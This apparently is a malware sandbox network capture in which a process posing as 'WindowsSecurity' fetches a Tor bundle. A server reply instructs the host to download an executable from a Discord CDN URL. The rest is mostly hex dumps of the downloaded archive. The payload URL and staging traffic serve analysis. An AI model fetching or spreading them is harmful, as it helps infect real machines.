2023-11-18 09:03:38 UTC	10707	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SXdT%2FCfLDj%2B2g0rzBjjVe4t%2Few3SQ9ap53%2FCjQofeyrDj9ZelLLTIxtON6%2BIkJFIHRxv%2Bs3QKUQh76ux5hWO7Fkx9qgJEiEjDovt9opaLyLSgyAt6hkxJUro5ObnQr%2BTxJtEEu8s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a95684e306a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:38 UTC	10707	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:38 UTC	10707	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49750	185.199.108.133	443	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:38 UTC	811	OUT	GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231118%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231118T090238Z&X-Amz-Expires=300&X-Amz-Signature=70af1f9a98f6f7decd9243215e43e906d5d375fed061f16f63b7782e965ba97c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1 Host: objects.githubusercontent.com Connection: Keep-Alive
2023-11-18 09:02:39 UTC	840	IN	HTTP/1.1 200 OK Connection: close Content-Length: 6710958 Content-Type: application/octet-stream Content-MD5: 9OeRN6tLfAr39BD4dWG/Iw== Last-Modified: Thu, 27 Jan 2022 16:21:05 GMT ETag: "0x8D9E1B104D9C2C4" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 5d8e3c6d-601e-005e-2d79-180ab5000000 x-ms-version: 2020-04-08 x-ms-creation-time: Thu, 27 Jan 2022 16:21:05 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=tor-expert-bundle-v0.4.5.10.zip x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 0 Date: Sat, 18 Nov 2023 09:02:39 GMT X-Served-By: cache-iad-kcgs7200078-IAD, cache-bfi-kbfi7400096-BFI X-Cache: HIT, MISS X-Cache-Hits: 933, 0 X-Timer: S1700298159.132785,VS0,VE124
2023-11-18 09:02:39 UTC	841	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 40 9b 10 53 2c f6 1c 9f 95 e7 05 00 94 e5 10 00 0e 00 00 00 6c 69 62 73 73 6c 2d 31 5f 31 2e 64 6c 6c ec fd 0b 74 14 55 12 38 0e 77 cf 74 c2 04 06 7a d4 01 83 66 25 68 ab 89 44 cd 68 d4 8c 04 0d 49 48 22 44 88 12 81 15 54 54 44 1e 59 45 9c 01 d4 2c 04 7a 26 a4 6d 07 a3 e0 1b 5f ab bb 8b 8b ba ec aa bc d5 3c 80 80 cf 88 22 ac f8 60 15 b5 c7 80 82 28 84 57 e6 7f ab ea 76 4f cf 24 ac fe 7e e7 fb 9f f3 7d e7 7c 9c 43 a6 bb ef ab 6e dd ba 75 eb d6 ad aa 7b f5 f5 0d 82 53 10 04 89 fd 8f c5 04 61 b5 40 ff 0a 85 df fe 57 cb fe f7 19 b0 b6 8f f0 7a da fb 03 57 8b 15 ef 0f ac 9a 32 f5 ee cc 19 33 ef bc 7d e6 cd 7f ca bc f5 e6 3b ee b8 33 90 79 cb 6d 99 33 83 77 64 4e bd 23 b3 64 d4 e8 cc 3f dd 39 e9 b6 0b 7a f7 ee a9 f0 3a 2a 87 09 42 Data Ascii: PK@S,libssl-1_1.dlltU8wtzf%hDhIH"DTTDYE,z&m_<"`(WvO$~}\|Cnu{Sa@WzW23};3ym3wdN#d?9z:*B
2023-11-18 09:02:39 UTC	842	IN	Data Raw: e2 4a 86 41 ad c5 1c 17 e3 95 67 78 d5 0c af ff 82 e7 3c a8 44 02 6a 33 a6 02 f4 1b 14 3e 6d 5b 38 1f 63 28 1d 42 bf 6e ac 9e 35 39 94 de a5 59 c4 6f 32 a1 e2 82 a7 b0 30 f5 9a 21 ec 3a c6 30 7d 3b d5 3d 39 0c b6 12 bd 46 29 0c 1f 0c dc a9 15 28 46 0b 6b 55 47 66 22 c3 f8 16 28 ac 97 19 c6 5e f8 5a a2 54 30 34 49 5a 0e 7c 73 b3 d7 72 c0 80 f1 af ef 44 81 be 49 5a 8b b1 f8 0f 0e 41 db a4 76 b8 66 bb d9 90 67 c4 94 b0 87 81 d5 e0 3b 48 f0 62 05 ac 99 d7 9f 06 78 72 b4 1d 7c fe e8 c3 5d e1 2d 72 e8 4d 41 c0 76 74 c1 59 e4 d6 8a dc fe 26 59 7d 09 c8 a9 48 12 5b 8b 50 dc 60 4d 19 af fe 22 0a ed af 43 3f 00 d0 34 f6 d5 77 10 6a 9d c5 6a 6d 5f 6a 7e ef 69 7d bf 11 be 87 cc ef 50 0d 2d 09 2c a9 98 25 45 27 5b 7c cc 4a 77 f0 f4 b3 20 bd b4 6b ba 93 a7 3b 21 fd 1c Data Ascii: JAgx<Dj3>m[8c(Bn59Yo20!:0};=9F)(FkUGf"(^ZT04IZ\|srDIZAvfg;Hbxr\|]-rMAvtY&Y}H[P`M"C?4wjjm_j~i}P-,%E'[\|Jw k;!
2023-11-18 09:02:39 UTC	844	IN	Data Raw: 10 8f 1a 6f 8a b5 29 fb 19 d7 6a 45 39 95 bd 9d ca ba c2 50 ec 06 78 4d 9a fd 13 5f a8 d6 41 59 10 21 d8 f3 85 58 7b a0 2f ed 92 51 de 64 9f 7d 3b 8d 59 4b 88 bd dd b1 84 18 e7 e4 25 20 6b 78 7c 8d 66 b6 86 f8 5b e2 fe 0e e5 79 a3 94 83 ff e3 62 6c 60 b8 d6 62 02 9a 01 43 b2 89 7d eb 07 54 03 6d fc 83 f2 a4 d2 ca 0b 5f 3a 16 53 ab fb 16 a7 08 49 3b 80 86 e4 77 6c 8f 63 c6 98 b7 98 e3 e5 0a b3 b9 bd b0 f6 43 73 65 48 ea 79 a0 75 c8 31 ce 05 d9 37 d0 3d 7e 9e a2 46 41 ac 6a 61 e3 61 bc cb f2 b6 6f b5 e4 11 c2 cf 18 96 a9 fd 3f 80 08 6b ff 02 75 f4 60 ac 16 5a bd 72 71 8a 60 bd b7 60 cb ec 6b 36 74 74 67 60 18 c2 73 25 b4 15 7b d8 5c fd 7f 65 4f fa 29 e1 ad 81 73 71 3d 1d 88 c8 61 33 ec f8 76 9c d9 8f 34 32 90 e4 95 b6 8e 9b 78 e0 fb 1d 26 fc 04 4f 6e 2f 43 Data Ascii: o)jE9PxM_AY!X{/Qd};YK% kx\|f[ybl`bC}Tm_:SI;wlcCseHyu17=~FAjaao?ku`Zrq``k6ttg`s%{\eO)sq=a3v42x&On/C
2023-11-18 09:02:39 UTC	845	IN	Data Raw: b1 5b 68 92 2c f1 71 b4 43 98 f7 55 78 cb bc 1c c4 17 b2 8a f6 0f 1b 54 43 9c df 04 08 65 d5 ec 6c 5f d5 e0 7f 08 6a 9e f7 78 fb 97 86 ef fe 14 c1 d7 d8 be bc fb f5 4f 5f 8c 6b ca 82 39 9c a5 b6 2e a8 b1 9e 6a f9 13 5f 77 6a 43 66 4a 6d bd 99 82 02 44 6b 9d 39 39 e6 6f 0a 71 16 3a bd 55 b4 64 d3 e4 59 19 ab 4f 11 cc 75 9c d6 c9 3f a7 d2 3a 79 c9 05 5d d7 81 e7 2f 34 d7 49 be ae 41 39 06 7e 96 3e 41 c9 25 f0 75 04 55 6d 14 35 7c f0 6d 55 3b 1c b3 dd ea 86 2c ad 6d 7c 5c ce 5a 7d 31 32 fe c0 59 66 0b 58 a8 c3 3d 7b 8c 6f ab 99 d7 26 1f 1b ab 37 89 d6 b8 da bb 71 21 ef 46 3e eb 06 b5 ef 5f 00 fc 76 56 aa 86 bf 04 4d fb 5f 59 5e ef 9f 45 d2 99 c3 42 0d 75 e5 d3 bb eb 0a d1 b6 b5 63 6d 55 04 9c c2 5a 78 41 dd 6f b7 fc 7e 02 a3 6f f5 44 f4 bd 0e 19 51 17 3e e2 Data Ascii: [h,qCUxTCel_jxO_k9.j_wjCfJmDk99oq:UdYOu?:y]/4IA9~>A%uUm5\|mU;,m\|\Z}12YfX={o&7q!F>_vVM_Y^EBucmUZxAo~oDQ>
2023-11-18 09:02:39 UTC	846	IN	Data Raw: 01 11 2d 7a 6e 2c 01 fe 21 49 25 9f ed a6 e4 27 f7 61 c9 bd 5c cf 3b 96 15 69 7f 17 32 b9 38 7a 5f 98 4b 9a d7 d5 8c cc 58 c6 0d 3c 63 46 52 dd e7 75 83 9b 39 54 f7 43 bc 48 4e 52 91 5f ba 01 67 18 15 b9 11 b6 48 6b e6 a1 78 ec 29 07 98 36 11 d1 cb a1 01 74 6a a2 00 f5 6b 1f 45 3b 49 61 ee b9 87 65 8a ca c0 e6 89 42 0b 6b 00 e8 cd 6c 96 31 9a 9e 10 61 bc 9f 14 55 78 e6 50 61 52 e9 32 96 3e bf 46 99 00 2b 98 bc f0 49 98 93 c5 d2 fc 7c 98 50 72 68 04 bc 3a 81 42 60 30 47 94 3a 2c 61 47 6d ec cd 6d 29 60 5d 03 39 a9 06 e4 b9 7a 2f 51 d9 36 06 0b 7c b3 ab 55 4d a5 e1 2f 19 94 e7 5f 0e 3a 92 80 3c 0e 48 b3 d5 d3 c6 f3 44 a0 9e 10 ce 1e c8 e6 4a ca 16 3d 83 b2 4d 8e 37 47 36 2e 2c ed fd d3 28 6d 78 37 a0 38 79 9e a9 bc 99 73 6c 79 9c f6 93 1d d0 8f f1 3c 0e 5b Data Ascii: -zn,!I%'a\;i28z_KX<cFRu9TCHNR_gHkx)6tjkE;IaeBkl1aUxPaR2>F+I\|Prh:B`0G:,aGmm)`]9z/Q6\|UM/_:<HDJ=M7G6.,(mx78ysly<[
2023-11-18 09:02:39 UTC	848	IN	Data Raw: b8 4f 81 d6 91 a8 4f 83 fa ae 4d aa ef e6 6e ea 0b b0 fa da 5f a5 fc e3 92 f2 4f eb 26 7f 09 cb 1f bd 2f de 31 d0 5b 91 c1 c8 f0 69 dc 68 ad 43 3b 25 49 bd c7 f7 57 65 ec f1 6d f1 77 34 f2 d5 1d ac 91 73 13 fc 03 80 ff 44 1a 3c 24 95 bb a2 ef c7 35 5c 71 fe 14 69 d8 9d c2 d3 5f e9 92 ce 18 28 a3 db 2c 7d 01 e4 01 3b 0e d2 97 e9 0b da 50 79 14 d8 a7 d7 42 ed 2d 96 de ab a5 2b ff ab 35 52 4c ae b7 7a d7 4d 09 f6 30 ab 27 26 bd ef ba 31 29 3d e9 7d d7 0d 49 e9 49 ef bb 26 24 a5 27 bd ef 1a 9f 94 9e f4 be eb fa a4 f4 a4 f7 5d 7f 4c 4a 4f 7a df 35 2e 29 3d e9 7d d7 d8 a4 f4 a4 f7 5d 63 92 d2 93 de 77 5d 97 94 9e f4 be ab 2a 29 3d e9 7d d7 e8 df c0 f7 84 df e8 ef 8d bf 81 cf 3f fe c6 78 8d 4f 4a ff 2d fc 8c f9 df fd e9 82 df 31 dd e0 27 61 bd d5 36 8d 06 29 65 Data Ascii: OOMn_O&/1[ihC;%IWemw4sD<$5\qi_(,};PyB-+5RLzM0'&1)=}II&$']LJOz5.)=}]cw]*)=}?xOJ-1'a6)e
2023-11-18 09:02:39 UTC	849	IN	Data Raw: 23 f3 f1 2e 3e 30 62 1b 0c d2 09 46 e7 94 db f8 e8 04 2a 92 07 44 5e f8 19 8c 04 0d ca d1 ff 31 28 dd d8 97 fd 5e bc 4e ba 15 bd b5 ba f0 67 db 37 da af 14 7b 00 c7 bc 6b bf 41 71 57 4e b2 28 0e 4e 91 81 bd 66 a2 bf ab 0d 52 58 e0 24 25 99 4c 8c 9a 49 16 8d d8 40 98 25 d8 c6 7b e8 ef 1b ef cf 26 a1 41 f1 63 09 63 bd b6 d3 1c eb 15 36 f5 0f 23 44 b4 3f 29 61 4c 67 82 92 cb 4a 55 5a 23 fc 7f d4 f1 52 86 4d 9c 21 34 a2 a7 99 56 28 b3 84 64 8b 94 df 3b 3e 1b 6e 46 ba 5f 89 fb 91 42 a8 b4 2f a8 65 b4 4a e2 d8 96 3e 20 79 ff 02 c6 cf 60 1a 32 d2 cb b8 ed b5 60 ef ea 1e 34 d4 1d 4c 3d 38 d4 e3 0c 16 e9 7f 74 31 31 6e 10 63 ca 8c 81 96 e8 f7 48 e2 57 91 aa cb 63 8c e1 7f a5 1d c5 79 59 ef 50 7f 40 79 ee 63 92 e7 f4 34 c6 fd d6 92 c6 91 b1 f6 86 f1 be c6 f8 62 01 Data Ascii: #.>0bF*D^1(^Ng7{kAqWN(NfRX$%LI@%{&Acc6#D?)aLgJUZ#RM!4V(d;>nF_B/eJ> y`2`4L=8t11ncHWcyYP@yc4b
2023-11-18 09:02:39 UTC	850	IN	Data Raw: 0b ee 6a 2d e5 72 03 58 64 a3 7f 5d 01 64 f7 72 12 9b 41 84 0e 47 5b c6 9a 71 29 02 df 7f 17 ea c3 25 fd e4 d6 42 3a 65 f5 e8 60 20 57 2e 69 95 2e 46 82 f1 75 e9 54 f3 08 20 89 6e 67 c4 e9 16 0f 0c 77 8c 21 e7 8e f6 a6 c9 36 ff 3e d7 59 66 76 0e f2 1f c7 a5 74 8d df c4 e1 cd 4a 84 d7 85 fb df b1 08 6f 6f 84 c9 3e 9f 06 9d 00 ae bb 92 e0 2a e4 70 d9 2a b0 c3 77 51 12 7c 6b c6 76 03 df 75 63 7d 31 5a 71 ab 51 c3 91 a7 df 00 78 ef d9 7e 23 8f 6b d2 62 99 14 71 27 d8 f3 56 02 d8 f3 ce 61 fb c2 62 b7 f6 15 f8 01 b4 96 12 a2 f7 69 77 bb 61 d9 b4 4d 71 ed 46 26 46 05 4e d2 c0 4a 3e 43 db 67 c9 4f 5a 50 b0 7d 48 d0 c3 26 f0 3b a4 3f 1b 7d 22 7d 81 1a 30 45 2f 77 6b 3d 5b ac f8 58 a4 9f 4d 67 b0 7b da fd 71 fe c2 72 9e a9 7d a5 8f 77 27 74 a3 40 31 6e 7d 03 09 8c Data Ascii: j-rXd]drAG[q)%B:e` W.i.FuT ngw!6>YfvtJoo>pwQ\|kvuc}1ZqQx~#kbq'VabiwaMqF&FNJ>CgOZP}H&;?}"}0E/wk=[XMg{qr}w't@1n}
2023-11-18 09:02:39 UTC	852	IN	Data Raw: cc 38 c6 e4 06 2b 1e dd a9 b6 78 74 b5 24 65 41 5e e3 85 91 24 31 2f 06 10 ea 0c 58 b5 5a 8c c9 60 f6 59 9c 69 dc 88 bf 59 c6 98 83 a0 6e ca d4 8a 73 99 80 9b a1 8f 86 a3 a1 be 74 20 d1 18 70 83 42 a3 8d 2b 34 60 c7 f6 38 e4 2e c6 10 3f 11 7c cc 85 c7 05 07 11 45 00 cb b9 bc db 00 87 51 34 12 34 a5 ad d8 b4 a9 1e 69 4b 88 73 97 ce e5 bd da 24 79 ef 3e db fe a9 aa 82 e2 dc 6d a5 b2 16 7d c6 cf 03 0a f5 15 d0 44 7b a9 c9 97 5d 57 d9 c0 80 b3 c5 42 74 81 fc f7 d5 a4 a8 1b 9e 98 0a 49 8f 5d 4d be 4d a7 fe ca 7a 55 8a 46 87 0f 40 af 20 b8 c1 ab ed c3 b8 de cb 55 d9 6d bd d7 f3 7a af e9 5a ef 95 bc de b7 7f 81 7a 11 71 79 dd d4 3b b6 db 7a 1d bc de 71 5d eb fd be 82 ea bd 1d eb c5 51 f8 fc 57 b3 de c8 5c 49 db cf be ea 77 64 a9 df 1f d3 c7 64 66 1f c6 58 02 3b Data Ascii: 8+xt$eA^$1/XZ`YiYnst pB+4`8.?\|EQ44iKs$y>m}D{]WBtI]MMzUF@ UmzZzqy;zq]QW\IwddfX;
2023-11-18 09:02:39 UTC	853	IN	Data Raw: fc cb f4 98 cb 1e 57 d3 a3 7d 47 af ab 40 ac 68 bf 91 82 15 c0 fe 49 5d 8f 3f a7 ca 8f 34 ab 46 3f 46 68 b3 64 9e 02 b4 ba 15 a6 fb cb ca eb f0 ba 37 80 7b d1 b7 53 89 bc 7c 43 9d 58 d7 7e 09 b7 49 0a af a8 9f b9 45 97 97 34 87 63 34 3f e4 47 1a 07 36 d7 57 29 83 1a 5a 8b bd 7c bf 69 3c ef 43 1c f6 d1 5f 03 94 01 f6 2f 74 50 ca f6 37 01 17 f3 3e 86 e7 e5 85 d8 4a f8 35 68 45 c7 9c 10 df 18 94 d6 eb c6 b1 aa f7 43 4b a1 57 60 09 a6 c9 d2 d1 37 d0 b3 55 cd 93 39 ee 47 d7 e8 ff f8 9c a0 4f 53 3b fa c9 e1 23 b0 a5 1d 9d a5 7d aa 7e e7 90 c3 bf b0 6a fd d4 5d 39 94 96 02 e5 bd 72 e8 6f 18 93 b3 af 1c ee 0d 5a 8f c5 d0 6a a4 a8 73 08 1b c0 79 f2 c2 28 0e 29 90 ad 53 05 9a 95 57 4e 11 e5 55 2e c6 03 f2 c1 0c 26 bc 45 30 3d b2 e5 95 20 d8 fb c1 21 3d be ed 35 fd Data Ascii: W}G@hI]?4F?Fhd7{S\|CX~IE4c4?G6W)Z\|i<C_/tP7>J5hECKW`7U9GOS;#}~j]9roZjsy()SWNU.&E0= !=5
2023-11-18 09:02:39 UTC	854	IN	Data Raw: 88 ab e5 a8 7f af 41 45 b7 c2 ba 3c 29 bc 37 78 ab 1d 29 7f 30 91 02 07 55 84 18 38 78 21 e4 b8 b4 e3 be c6 b4 5f 83 27 75 89 af 05 f8 c1 e0 04 3b d8 70 57 d9 63 88 ff bc 1b f8 f3 ff 09 5e 6a cf ed 8a 17 e8 0f eb 08 98 18 a4 33 f0 33 f4 06 94 47 46 2a ad 70 81 16 6c b4 22 d3 24 7f 53 20 43 6b 61 e2 96 6f 2f db db 9d 34 79 f0 f5 19 81 5e 7a a9 44 1b bb 59 bd cc 98 bb 6c 61 89 4c f3 b4 f6 00 a2 e0 df 6c e7 cd 58 f3 41 86 1e 31 e8 d7 57 c0 91 88 be 3a 87 fd 8d 3c 0e cf da cc 3c ed de 7c bd 16 32 4d 56 0b 1d 62 42 88 c2 b8 3d d2 bd 9e c9 aa 43 8c 0c 97 d8 ce 22 f2 38 9e 23 de 2b e9 d7 7a b5 6b 24 7d 8c 4b bb c6 a5 d7 43 15 ad 43 d1 7d b7 75 a8 97 7e 40 67 8c b4 7f 74 59 2c d6 fe 82 75 9e 68 fa 47 6b 9e 94 65 40 06 0b 72 65 9a 31 80 bd 4c 3e 73 a2 75 b9 e6 fc Data Ascii: AE<)7x)0U8x!_'u;pWc^j33GF*pl"$S Ckao/4y^zDYlaLlXA1W:<<\|2MVbB=C"8#+zk$}KCC}u~@gtY,uhGke@re1L>su
2023-11-18 09:02:39 UTC	856	IN	Data Raw: 33 60 a9 03 5f 5f 57 1a e0 07 43 b3 6a eb 95 6a f6 e2 8b a1 21 6b 48 59 9a 86 1c b9 04 44 51 60 06 70 ed 2b 58 7d 40 9e 9d 11 ef 6a 18 6f 67 ba da 28 f9 9b 83 87 f4 ba 89 c8 fd 03 d7 45 aa 6a 8f ea 2f 3f 5a 4f bc b7 14 68 07 c2 77 53 28 2c 8f a5 f8 0d 29 4b f8 46 d6 b8 f3 38 86 ff ac 4e 8b 87 ff 6c e8 03 ea 32 80 9f c7 f3 1e 53 a3 af 45 11 38 16 38 85 4d 5a 88 01 53 59 c8 e8 a6 95 1a f6 87 10 ae d9 b3 7d 8d bd 96 2a 2f b2 c7 c0 2b 6c e5 01 1d 41 1d 9a 68 ed 24 aa 0a 37 f2 eb 66 ea 4c e3 ac cb 07 a1 b9 d6 1d f1 2f 59 83 c8 36 ca 05 bf ad 0c c2 72 50 04 c3 36 31 76 cf 24 18 98 56 d8 a0 1d ed 11 0f e8 34 0b 4d 66 08 bd b8 f0 9b b7 cd 0c 3b 93 36 97 93 ad 80 b0 5e d2 3b 70 a8 1a 59 81 72 14 90 97 80 18 d3 8b b7 c3 4a 9c 05 d3 ac b4 46 af 6f 13 48 d5 7b 44 b2 Data Ascii: 3`__WCjj!kHYDQ`p+X}@jog(Ej/?ZOhwS(,)KF8Nl2SE88MZSY}*/+lAh$7fL/Y6rP61v$V4Mf;6^;pYrJFoH{D
2023-11-18 09:02:39 UTC	880	IN	Data Raw: 51 33 89 e3 d7 71 8e ef a2 95 c1 e2 fd 9c ef 07 91 d3 05 ce 33 29 12 16 58 67 5d 28 d5 d2 b0 43 50 3e e3 ce 35 84 04 07 85 b9 f4 f6 fe 9d 4b db 58 af 29 98 9d 41 30 79 61 58 da 37 e8 8f 4e 92 b1 b3 b9 20 56 dd 0c c0 17 c5 c2 cd 72 b8 27 eb d3 c0 cd 5a 33 7c 1e 4e 27 1a b9 d9 6d d1 f3 8f 62 ac 92 4c 5c 5e 2d ca 56 85 64 ca 96 c3 97 c0 40 d2 6a 83 6b 8d 49 ca b4 e6 44 9f 67 08 cc c6 f0 c1 f0 d1 df c2 46 46 2e db 01 db 10 63 7c 2b 0d e2 4f 80 d6 9b 5c d1 77 61 16 39 90 f7 c8 a1 ef 69 14 b0 2a e4 4a f2 a2 4f 00 ef 67 1d 4e 6c 4e db 01 6b 18 b6 65 66 8f 9e 0f 79 18 5a b1 fb 3c d4 5c 84 42 6d 03 2f 86 40 a8 1e fe 1d d5 d0 a7 12 f2 d8 23 a0 53 30 2e fa 15 01 5b f4 e6 41 c4 c7 04 0a d1 7d 9d bc f0 0b 9c ad 35 51 91 93 c8 7f 80 44 ee e7 88 fe 73 d2 10 45 4e 30 44 Data Ascii: Q3q3)Xg](CP>5KX)A0yaX7N Vr'Z3\|N'mbL\^-Vd@jkIDgFF.c\|+O\wa9i*JOgNlNkefyZ<\Bm/@#S0.[A}5QDsEN0D
2023-11-18 09:02:39 UTC	881	IN	Data Raw: d7 73 4b 9c 20 88 4b a3 c1 30 05 10 00 c6 0d 26 a6 c8 b8 c5 23 87 b6 e0 89 bf 09 98 1c 5e 43 66 da c6 f3 a7 50 a8 be e8 32 ce e7 a7 27 69 80 65 3e a5 01 ae 67 ec f2 0d d8 8f a7 31 f9 e6 db e3 89 46 0b 76 b9 b5 1d 6e 7d f2 fa e1 0e 87 dd c6 77 7f 48 49 38 df a9 01 e5 a1 80 96 8f 0d dc fb 59 b7 22 ff 67 99 2e 93 25 4a be 69 5c 59 ed 6b d4 87 59 f2 82 d7 94 17 7a 91 d0 f8 e0 4a 92 ca 72 a1 85 75 38 ed c3 e6 99 d1 37 4e 5c d9 97 90 25 e6 12 b2 c4 6c 54 7f e8 a7 1e 01 4b 4c fa 04 21 9b 2e e8 89 74 f3 22 45 4d 78 a4 39 c4 78 c5 69 3d ad 52 fd 82 7d f4 b0 8b 34 06 e1 47 b8 8c b4 e8 54 9a 55 a5 74 ed 78 8e 99 17 b8 0f d7 be e9 91 09 c4 0f 1f 69 1e d8 a6 fd 30 70 07 13 5d 8a 23 61 89 d6 aa f2 d6 22 6e a2 10 c8 a3 7d cd 93 60 17 e7 3b 68 e9 6f ef cb 34 63 2e aa 9b Data Ascii: sK K0&#^CfP2'ie>g1Fvn}wHI8Y"g.%Ji\YkYzJru87N\%lTKL!.t"EMx9xi=R}4GTUtxi0p]#a"n}`;ho4c.
2023-11-18 09:02:39 UTC	911	IN	Data Raw: 75 80 ed f5 1c f6 57 3d da 4b 0e dd d9 81 15 66 5a 0c f4 7e a8 6c 41 80 a4 9b 70 0d 2c 2b 45 68 45 01 2e 6d 17 5c 9b 6c 83 fd f9 29 89 36 d8 c7 4e 4e 89 e3 fd b4 8e f8 7e 82 f1 91 b7 24 0e 5a f6 26 ff dd 8c a0 ee 76 39 41 e9 d0 44 cc 0d 4d 82 dd 34 83 7f bc 13 dd e8 32 b3 ef 76 89 77 7b 9c ff 86 19 a2 e1 5f 08 54 bd 25 d8 db 9c d6 f8 4d ed 74 ca 75 5b 61 cd 60 13 4a 0e bf c2 97 c2 69 a9 dd 4e a5 0f 40 a8 1e 06 06 aa 99 ad c3 68 d7 ba 22 6e a0 1a 09 28 13 4c 23 d5 1e 89 03 66 d1 18 f4 0d 68 2c 37 e6 b0 6e 8f db 6a 37 50 cd 53 8c f7 4e 4a b1 ae 6b d9 66 33 50 fd a5 0f eb 59 38 c0 39 21 ef 06 4e aa b0 69 9d fa 12 cb 19 fd ea 20 57 0e 82 32 e0 2f 07 e3 81 3b e1 8a 32 f8 25 b9 2e ba 0a fc a2 99 dc a7 6d 04 0e bb 09 e8 f9 08 e3 5e a6 b9 6f 66 12 cd 1d 4c 9a 2e Data Ascii: uW=KfZ~lAp,+EhE.m\l)6NN~$Z&v9ADM42vw{_T%Mtu[a`JiN@h"n(L#fh,7nj7PSNJkf3PY89!Ni W2/;2%.m^ofL.
2023-11-18 09:02:39 UTC	912	IN	Data Raw: 7d 19 94 6f c1 48 41 13 b1 df 6d 00 e7 93 a9 d0 ef 36 b3 df 3c e2 64 52 7c 93 f2 2c 6d 5c ce 78 1b 3d f2 f8 ec b9 fa b8 0c bd 1e a3 b1 ed 0c 8c 57 57 bf cc e8 d2 a1 37 54 a1 1d e5 0a ba 6b ec 16 50 1e 89 30 c0 20 b7 f6 df aa 7e bd 56 6d ae 64 4d fb 76 c2 68 4f e4 a3 fd 22 1f 6d b0 52 c5 90 53 4f fc 02 6c 23 4b db 31 1e fc 45 1e da 45 77 f2 7b f5 86 39 74 07 5a b5 fe 30 7d 0b dc 02 f7 ed 39 ab 94 7c 67 fd 38 d0 cf 7c 34 3b 5d c3 27 d4 71 f2 3a 88 5e 2d 58 16 d9 60 89 de 69 d9 6d ea 1a d4 e9 7f 47 2e fb 08 8c 00 86 82 c9 f3 f3 91 59 26 bf 0b 12 90 16 d0 25 36 a0 2d ff 9c 5d 07 2c c0 ed f4 02 77 cc e7 e9 c5 19 18 87 77 34 58 6f 78 f4 d1 5e cb 93 d0 bc d5 b4 10 0e 2d 0c 7e 60 76 5b 0a 4c d0 39 05 5a b1 8b 95 d4 8a bd ac 5e 7e 73 bc 25 bf b9 b8 a5 1f 0e 6a ab Data Ascii: }oHAm6<dR\|,m\x=WW7TkP0 ~VmdMvhO"mRSOl#K1EEw{9tZ0}9\|g8\|4;]'q:^-X`imG.Y&%6-],ww4Xox^-~`v[L9Z^~s%j
2023-11-18 09:02:39 UTC	919	IN	Data Raw: af 07 07 8d 32 47 fd 04 a5 8c 65 bf 4a 5e 55 96 0a 58 83 f8 cb 65 8c d0 46 98 68 8e 2e b1 c5 13 32 06 1f 96 f0 e4 1a 18 16 3f 40 cf b3 db 7c 16 1f a6 eb ec 0f f0 63 35 80 c4 36 8a a1 cb c1 f2 6a 72 5c 6e 03 c3 fd 9d 78 bf 7d 87 24 d0 ce 02 f9 f2 4e 8c 70 df 00 11 62 19 ac a8 d0 c2 79 19 36 59 ea 67 87 89 84 9e 3c 6c 63 a9 e1 b3 a1 cf 7c 28 9f bb 98 e6 e5 49 9d a8 71 35 55 97 3a f8 87 ba 30 b6 22 38 02 94 ba b9 29 4b a1 13 87 db 0b 93 86 66 cc 28 3e 63 0a ed e3 6b d6 fe f0 c5 34 71 fa 27 d8 7f 98 68 50 a0 37 e5 2c c9 78 87 71 aa 44 7b 27 26 57 79 31 5e 75 35 6b 77 84 2b 32 47 f4 35 fa 0f cf 2c 62 c2 02 5b ab 5d 31 cd 10 0f c1 5a bd 4f fb d9 b7 cf f7 43 5a 9b cf d0 9a b5 cd d9 1d be 0e df 87 69 1d 6c f5 6e 6b ea 18 a0 35 c3 7a 9d bd 1f ae 9a 69 d2 da d8 a2 Data Ascii: 2GeJ^UXeFh.2?@\|c56jr\nx}$Npby6Yg<lc\|(Iq5U:0"8)Kf(>ck4q'hP7,xqD{'&Wy1^u5kw+2G5,b[]1ZOCZilnk5zi
